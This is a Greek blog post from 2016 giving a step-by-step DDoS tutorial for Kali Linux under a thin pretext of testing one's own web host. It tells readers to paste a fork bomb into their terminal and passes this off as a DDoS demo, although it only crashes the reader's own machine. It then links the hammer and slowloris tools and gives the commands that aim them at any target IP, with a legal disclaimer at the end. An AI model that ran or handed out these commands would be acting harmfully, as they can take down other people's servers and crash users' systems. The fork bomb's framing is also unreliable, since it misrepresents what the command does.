Τρίτη, 22 Νοεμβρίου 2016

ΠΩΣ ΘΑ ΚΑΝΩ DDOS ATTACK ΜΕ ΤΟ KALI LINUX





Η σκοπιμότητα αυτού είναι να τεστάρουμε αν ο web hosting server μας που έχουμε ένα δικό μας site ή άν είστε web developers για τους πελάτες σας είναι ιδανικός ώστε να αποφύγουμε περιπτώσεις επιθέσεων.

παράδειγμα για να καταλάβεται πως δουλεύει ένα DDOS attack μπορείτε να κάνετε ένα copy paste στο τερματικό σας την παρακάτω εντολή


# :(){ :|:& };:


1. Πάμε στο github και κατεβάζουμε το  https://github.com/cyweb/hammer/archive/master.zip ή https://github.com/llaera/slowloris.pl/archive/master.zip ή και τα 2 άν θέλετε και επιλέγεται η λήψη να γίνει στην επιφάνεια εργασίας για να μην γράφετε μεγάλο path στο τερματικό σας και το κάνετε αποσυμπίεση


#nslookup <target>
              ή 
#ping <target>

όπου target είναι είναι η ιστοσελίδα που μας ενδιαφέρη και αυτο γιατί τα scriptάκια μας χρειάζονται την ip για να μας δώσουν αποτελέσματα.

2. Το ένα script ειναι γραμμένο σε python3 και το άλλο σε perl και ξεκινάμε με την python3


# cd Desktop

# python3 hammer.py -s <target-ip> -p 80 -t 1000




με Ctrl+c το σταματάμε

χτυπάτε για 5 λεπτα,άν το αποτέλεσμα είναι ίδιο με την εικόνα τότε ο server είναι καλός άν αρχίζει και κοκκινίζουν τα γράμματα τότε πρέπει να αλλάξετε web hosting server αμέσως.

3. Ανοίγουμε ένα τερματικό και πληκτρολογούμε


# cd Desktop

# perl ./slowloris.pl -dns <target-ip> 






με Ctrl+c το σταματάμε
 
η δουλειά του είναι να δημιουργεί sockets και να ενεργοποιούνται κάθε 100 δευτερόλεπτα, με το συγκεκριμένο ο SERVER σας φτάνει στα όρια του παρόλο που δεν σας επιστρέφει αποτέλεσμα, απλά ανοίξτε τον web browser σας και μπείτε στην σελίδα που δοκιμάζεται και μετά απο 10 λεπτά δοκιμάζεται με το F5 να δείτε άν είναι πάνω η σελίδα σας ή αργεί να φορτώσει ή αν εχει πέσει κιόλας. 






































IF YOU BREAK ANY OF YOUR DEVICES IN ANY WAY, CAUSE THE END OF THE WORLD, GET ARRESTED, OR NERD RAGE ON YOUR FAMILY, I AM NOT RESPONSIBLE.
I AM NOT RESPONSIBLE FOR HOW YOU USE ANY INFORMATION CONTAINED HEREIN, IT IS INTENDED FOR EDUCATIONAL AND RESEARCH PURPOSES ONLY. IT IS SOLELY YOUR RESPONSIBILITY TO UNDERSTAND AND FOLLOW LOCAL, AND INTERNATIONAL LAWS. DO NOT INTERACT WITH ANY SIGNAL BUT YOUR OWN!